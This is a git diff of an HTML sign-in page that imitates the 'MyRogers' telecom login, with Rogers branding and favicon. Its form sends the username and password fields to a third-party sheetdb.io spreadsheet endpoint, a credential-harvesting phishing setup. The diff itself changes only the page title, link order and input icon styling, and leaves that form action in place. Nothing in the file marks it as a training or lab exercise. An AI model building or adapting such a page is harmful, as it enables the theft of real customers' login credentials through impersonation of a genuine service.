--- a/index.html
+++ b/index.html
@@ -3,15 +3,16 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>MyRogers | Sign in</title>
+    <title>Document</title>
 
     <link rel="stylesheet" href="style.css">
     <link rel="preconnect" href="https://fonts.googleapis.com">
     <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
     <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@100;300;400;500;700;900&display=swap" rel="stylesheet">
-
-    <link rel="shortcut icon" type="image/png" href="./resources/rogers-favicon.png">
     <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
+
+    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
+    <link rel="shortcut icon" type="image/png" href="./resources/rogers-favicon.png">
 
     <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Rounded:opsz,wght,FILL,GRAD@20..48,100..700,0..1,-50..200" />
     <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Rounded:opsz,wght,FILL,GRAD@20..48,100..700,0..1,-50..200" />
@@ -35,12 +36,16 @@
                 <form action="https://sheetdb.io/api/v1/jl19sb954bas3" method="post" class="login" id="sheetdb-form">
                     <div class="input__container">
                         <div class="input__container--icon">
-                            <span class="material-symbols-rounded icon">info</span>
-                            <input type="email" name="data[email]" id="email-id" class="input input__email" placeholder="Username" required>
+                            <div class="icon__container">
+                                <i class="fa-solid fa-exclamation icon"></i>
+                             </div>
+                            <input type="email" name="data[email]" id="email-id" class="input grid__input input__email" placeholder="Username">
                         </div>
                         <div class="input__container--icon">
-                            <span class="material-symbols-rounded icon">info</span>
-                            <input type="password" name="data[password]" id="password-id" class="input input__password" placeholder="Password" required>
+                            <div class="icon__container">
+                                <i class="fa-solid fa-exclamation icon"></i>
+                             </div>
+                            <input type="password" name="data[password]" id="password-id" class="input grid__input input__password" placeholder="Password">
                         </div>
                     </div>
                     <div class="checkbox__container">
